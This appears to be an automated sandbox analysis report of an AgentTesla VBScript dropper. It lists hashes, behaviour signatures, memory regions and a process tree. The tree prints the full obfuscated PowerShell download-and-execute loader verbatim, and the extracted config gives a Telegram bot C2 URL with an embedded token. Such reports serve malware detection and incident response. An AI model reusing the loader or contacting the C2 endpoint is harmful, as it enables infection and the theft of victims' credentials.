Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2023 02:00

General

  • Target

    2.vbs

  • Size

    63KB

  • MD5

    d7f4238ff5acac175beb585a26c9cef2

  • SHA1

    d451e565ec848d6fb1e5562c2a50ab4fb06d6a4f

  • SHA256

    816a6f59d836acb9545db79aa246be0be62f43e330c5c93796b1fe2455eab504

  • SHA512

    57bc54e5f52d6d7e780930ba82f5b0f8d72a6cd8ea580430dea73ffe37dec93f1a9ccec70f01d4ced88bc2dac4fcf6e9d920d47708a098f78b119b2eb79c4628

  • SSDEEP

    768:efTBMY0EFQXNaY7jwox9F40IZZKlWD7v/IJRxQzPho+Qz0eNgzTMTH6cmJ:e24Yf/xn40IZZGWDsxKPgzuTMecmJ

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6492548685:AAFSsnUD0WBiVAaUi2pEpecDU82loa1C6EU/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
      "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" "Function Kokain ([String]$Snyltet){For ($Erhvervsbetonede=7; $Erhvervsbetonede -lt $Snyltet.Length-1){$Tilsnits+=$Snyltet.Substring($Erhvervsbetonede, 1);$Erhvervsbetonede=$Erhvervsbetonede+8;}$Tilsnits;}$Aarvaagenhed=Kokain 'AssociahForsvintcausaestHymnaripQuinism:Splashi/Dobrasf/Semipar1hamburg0Teknolo3derheni. Bolsma1 Bulens7Klukkes6Timorou.Indblst1 Overto1Algebra1Aksiome. Sammen1 Callig6Kommuna3Voteenl/FlotatiKHittendrAbefestocoriacekSonanceu Tylerisanchovye UvurdenTegnflgsSavatio.UndelibfNielavalSportsha Selius ';$Tilsnits01=Kokain 'GaddiudiStrengpeRefreshxBetelso ';$Intercommunal= $Tilsnits01;$Tilsnits00=Kokain 'Ciruela$RapportEekvipernSnowshoc ToothpeMoorcocp MezquihSakralraLsesummlCurricuoHicksitmFurrilye ForkldtSuzyswarfenchoniProtraccDozerfr Klitori=Barless Meterma(MischarNballgoweBrockiswsyntagm-IaniminOSlukninbRabuloujPaasmrie HvastkcSlutdattBrioche LoachaNOmbygniePaprikst Eksplo.ElatrenWGrindaleTongaskbuddanneCBawdstrlKrigsreiTrachileChauvinnKatalogt Ltning)Rokketn. DunsteDderideroFaldnedw SprkkenChokolalUdeslato Femdaga agended hydrioSRomertat DecrysrInthraliFluozirnKabeltog indlan( Blsebl$ImbricaABlinketa ArterirAnsaenovPeamoutaAckgodhaKongepig EndysieRaastofnUnexchahJuleaftePhosphodFiksati)barslej ';.($Tilsnits01) (Kokain 'Hedvinp$alberikc DemaskohjecykenKoordindParatube Sixtypm EmancinOrsellieKreppetd Feezed2Egranul=Begroan$FrkhedeeCatlapanTetgloovHierofa:RaphidiaSnkningpbovestrpRetestid NasophaRidderstWestlanaUnsmili ') ;$condemned2=$condemned2+'\tilkomsten.Fje';. ($Tilsnits01) (Kokain 'Valishi$VidenskTmelodraeLgnsuppkRuttetsn recompiOuttrotkRelakseeVerdensrKreditonpartipoeCircinasBritain= Stanno-GelosinnKasauneoFredsdutSvkkels(SeddelmTSplejsneSnagglesSmaapentStarkye- ObsecrP Rdselsa StimultInertiahMedleve Tillrte$SnderkncGangliioMtaalignnoncorpdMaskinfeDefinitmAutorssnBeadroleSaturdadprecong2Selvris)triarea ') ;if ($Teknikernes) {while ($Encephalometric -eq $Tilsnits3) {& ($Tilsnits01) $Tilsnits00;.($Tilsnits01) (Kokain 'KogerauSTuaregitostraciaPalletsr SpattetRepeals- RoundsSCommunilNedsteme AntiseeBarrerapSandbls Civils5 Revuls ');}& ($Tilsnits01) (Kokain 'SkildriSPhysioge ScotoptUncreos-VelometC WhittaoSanctitnBrachestValbyspePejsestnRibosestabsolve Tilran$GttelegcOmdrejnoHjrejusn Sljfefdapologie horsiemPindensnTykkerte produkdEpiscop2 maksim boserup$ UdelikE UmennenradiotecClockcaeOctoniop BondwohCalimana JundielBerelseoDonisafmTilbydeeQuartertConditirRakkeriiPeriodic Invita ');}& ($Tilsnits01) (Kokain 'Frifind$ SandafEHuldratnConcealcFriholdeReoilsppWhitoveh PraeseaHarmedpl ombresoOverloam rowenaeVipstjrtPhosphorSatineci AtriumcOverens Beundri= Magnet ExplantGGudfrygeGrossettPlenism-SydvestCcolourcoAptenodnHysteretBeholdneKombinenOvogenotTampone Hjemsen$MarcotucDrikoffo RenskrnVelklaedsusannae DagsommPasfotonlevebrdeVideobadCopalif2gennemt ');& ($Tilsnits01) (Kokain 'Apparen$OrdholdVWoyawayiBesideloDeklinelSupervioMalkematDisjointLandhusaErhverv Uddelig=Hachisp Audiome[ VagtseSMagtstiytranspls ammunitGeneraleSkrppenmbedinvo.BrugeruCskriveboSemigirn udtrykvSexisteeForlstervinklertBogsuna]Helbehd:Lucenti:BrevstaFChoisyarsammensoKrestermSulfaquB EksperaCrosiersFremproeFlydhol6 Puerto4LeucocyS Pantnit FestonrRekordtiTallerknsammenrgFiskeek(Eleemos$ ScorpiE Hypoisn UlniercOpstsigeSkatosipVengeunhPhallita retrollSpongoboStopligmhusmndse ArbejdtFonologrImmatchi Passiacflashli)Synthet ');. ($Tilsnits01) (Kokain ' Bravur$JasiesdTEliansviVadefuglAdkomsts NonrevnSkattekienergist Skaanes silvic2Kvikkei Sejremo=Phospha jalousi[SuperfiSBuffoopyKonkavssTofagsvtRattaileJelaagbmAlmoder.OphthalTStrangueEnstemmxAarefort toaste.GrundstEIntercunGotadenc ChampaoAnmiensddronishiPulloven brushngStampub]Syndika: franko:StttevoAfictionSgrumphyCReferenIspaltniIPrincip.FllesanGSiameseeTndstiktBlokfriSKlarhovtCounterrSportziireklamenTrimarggCaturba(Coelast$igjenneVQeethiciUncribboArometel Bortvio CentritDispositExpatiaaChristi)Telefon ');. ($Tilsnits01) (Kokain 'Vimfuln$ HyperaiCurvatinPolystosTyfoideeSifonerkClipsomtPatricigPortrtticompetifTroppentboordly=Unevoka$PakkeliT AngrebiDiscabil ClaesfsParadisnTredjegi Snowbit AndelssMaillec2Minifie.Ledespos SkimmiuTrigonobSubtraksAtavicotNondepar Ridgiei AarbgenAcheatdg Gallsi(Diskuss2Doktrin7 Mellem9metalli6Ingenuo8Maclibl9Vellama,Medbygg9Bstrups0Belbsgr2 Angiot2 fundet)Ferment ');. ($Tilsnits01) $insektgift;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2388
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 16"
        3⤵
          PID:4100
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo 16"
          3⤵
            PID:2848
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 16"
            3⤵
              PID:3528
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo 16"
              3⤵
                PID:2992
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "echo 16"
                3⤵
                  PID:2772
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                  3⤵
                    PID:1196
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                    3⤵
                      PID:5004
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                      3⤵
                        PID:3564
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                        3⤵
                          PID:3140
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                          3⤵
                            PID:1956
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                            3⤵
                              PID:4620
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                              3⤵
                                PID:4784
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                3⤵
                                  PID:1732
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                  3⤵
                                    PID:3768
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                    3⤵
                                      PID:784
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                      3⤵
                                        PID:1112
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                        3⤵
                                          PID:4296
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                          3⤵
                                            PID:4692
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                            3⤵
                                              PID:1720
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                              3⤵
                                                PID:3896
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                3⤵
                                                  PID:4500
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                  3⤵
                                                    PID:4604
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                    3⤵
                                                      PID:1696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                      3⤵
                                                        PID:1908
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                        3⤵
                                                          PID:4596
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                          3⤵
                                                            PID:1660
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                            3⤵
                                                              PID:4568
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                              3⤵
                                                                PID:3860
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                3⤵
                                                                  PID:4284
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                  3⤵
                                                                    PID:4288
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                    3⤵
                                                                      PID:2964
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                      3⤵
                                                                        PID:4152
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                        3⤵
                                                                          PID:4976
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                          3⤵
                                                                            PID:4864
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                            3⤵
                                                                              PID:2800
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                              3⤵
                                                                                PID:4812
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                3⤵
                                                                                  PID:1788
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                  3⤵
                                                                                    PID:2360
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                    3⤵
                                                                                      PID:2952
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                      3⤵
                                                                                        PID:1088
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                        3⤵
                                                                                          PID:4408
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                          3⤵
                                                                                            PID:4684
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                            3⤵
                                                                                              PID:728
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                              3⤵
                                                                                                PID:2100
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                3⤵
                                                                                                  PID:1760
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                  3⤵
                                                                                                    PID:5000
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                    3⤵
                                                                                                      PID:1480
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                      3⤵
                                                                                                        PID:560
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                        3⤵
                                                                                                          PID:988
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                          3⤵
                                                                                                            PID:2832
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                            3⤵
                                                                                                              PID:3512
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                              3⤵
                                                                                                                PID:2476
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                3⤵
                                                                                                                  PID:1500
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                  3⤵
                                                                                                                    PID:4852
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                    3⤵
                                                                                                                      PID:1684
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                      3⤵
                                                                                                                        PID:888
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                        3⤵
                                                                                                                          PID:3268
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                          3⤵
                                                                                                                            PID:4952
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                            3⤵
                                                                                                                              PID:3236
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                              3⤵
                                                                                                                                PID:3780
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                3⤵
                                                                                                                                  PID:1464
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                  3⤵
                                                                                                                                    PID:4336
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                    3⤵
                                                                                                                                      PID:2220
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                      3⤵
                                                                                                                                        PID:3052
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                        3⤵
                                                                                                                                          PID:2604
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                          3⤵
                                                                                                                                            PID:4100
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                            3⤵
                                                                                                                                              PID:1792
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                              3⤵
                                                                                                                                                PID:3024
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                                3⤵
                                                                                                                                                  PID:1496
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c "echo 16"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4120
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:3272
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 1816
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4604
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3272 -ip 3272
                                                                                                                                                1⤵
                                                                                                                                                  PID:3896

                                                                                                                                                Network

                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                Replay Monitor

                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                Downloads

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zczxnzxr.vxv.ps1

                                                                                                                                                  Filesize

                                                                                                                                                  60B

                                                                                                                                                  MD5

                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                  SHA1

                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                  SHA256

                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                  SHA512

                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                • memory/2388-24-0x00000000088E0000-0x0000000008E84000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  5.6MB

                                                                                                                                                • memory/2388-20-0x0000000007CB0000-0x000000000832A000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  6.5MB

                                                                                                                                                • memory/2388-3-0x00000000056D0000-0x0000000005CF8000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  6.2MB

                                                                                                                                                • memory/2388-4-0x0000000005580000-0x00000000055A2000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  136KB

                                                                                                                                                • memory/2388-5-0x0000000005620000-0x0000000005686000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  408KB

                                                                                                                                                • memory/2388-6-0x0000000005D70000-0x0000000005DD6000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  408KB

                                                                                                                                                • memory/2388-27-0x00000000749B0000-0x0000000075160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  7.7MB

                                                                                                                                                • memory/2388-16-0x0000000005E20000-0x0000000006174000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  3.3MB

                                                                                                                                                • memory/2388-17-0x0000000006460000-0x000000000647E000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  120KB

                                                                                                                                                • memory/2388-18-0x00000000064A0000-0x00000000064EC000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  304KB

                                                                                                                                                • memory/2388-19-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/2388-40-0x00000000749B0000-0x0000000075160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  7.7MB

                                                                                                                                                • memory/2388-21-0x00000000069E0000-0x00000000069FA000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  104KB

                                                                                                                                                • memory/2388-22-0x00000000076D0000-0x0000000007766000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  600KB

                                                                                                                                                • memory/2388-23-0x0000000007630000-0x0000000007652000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  136KB

                                                                                                                                                • memory/2388-2-0x0000000002B30000-0x0000000002B66000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  216KB

                                                                                                                                                • memory/2388-1-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/2388-30-0x0000000007A80000-0x0000000007A81000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/2388-31-0x0000000008E90000-0x000000000D9D4000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  75.3MB

                                                                                                                                                • memory/2388-32-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/2388-33-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/2388-34-0x00000000773D1000-0x00000000774F1000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  1.1MB

                                                                                                                                                • memory/2388-0-0x00000000749B0000-0x0000000075160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  7.7MB

                                                                                                                                                • memory/3272-43-0x0000000023E80000-0x0000000023E90000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/3272-37-0x000000006F120000-0x0000000070374000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  18.3MB

                                                                                                                                                • memory/3272-38-0x0000000001170000-0x0000000005CB4000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  75.3MB

                                                                                                                                                • memory/3272-41-0x00000000749B0000-0x0000000075160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  7.7MB

                                                                                                                                                • memory/3272-36-0x00000000773D1000-0x00000000774F1000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  1.1MB

                                                                                                                                                • memory/3272-42-0x000000006F120000-0x000000006F160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  256KB

                                                                                                                                                • memory/3272-35-0x0000000077458000-0x0000000077459000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  4KB

                                                                                                                                                • memory/3272-45-0x0000000001170000-0x0000000005CB4000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  75.3MB

                                                                                                                                                • memory/3272-47-0x00000000749B0000-0x0000000075160000-memory.dmp

                                                                                                                                                  Filesize

                                                                                                                                                  7.7MB